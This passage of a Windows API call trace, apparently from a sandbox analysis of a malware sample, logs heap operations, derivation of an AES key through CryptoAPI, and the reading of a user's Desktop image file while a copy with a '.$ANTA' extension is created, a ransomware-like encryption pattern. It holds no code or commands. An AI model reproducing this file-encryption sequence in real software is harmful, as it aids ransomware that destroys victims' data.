returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.118] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0132.118] CryptHashData (hHash=0x41ac780, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.119] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.119] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.119] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0132.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caf28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0132.120] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac100) returned 1 [0132.120] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.120] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0132.120] CryptDestroyHash (hHash=0x41ac780) returned 1 [0132.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\g6f-14r3g3szgybip.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0132.120] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.120] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0132.121] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0132.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\g6f-14r3g3szgybip.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0132.124] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0132.124] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0132.126] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x7606, lpOverlapped=0x0) returned 1 [0132.127] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0132.129] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0132.129] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0132.129] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0132.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0132.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0132.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0132.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0132.130] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0132.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0132.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0132.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0132.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796ee8 [0132.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0132.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0132.134] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e2a00, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2a00*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0132.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0132.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 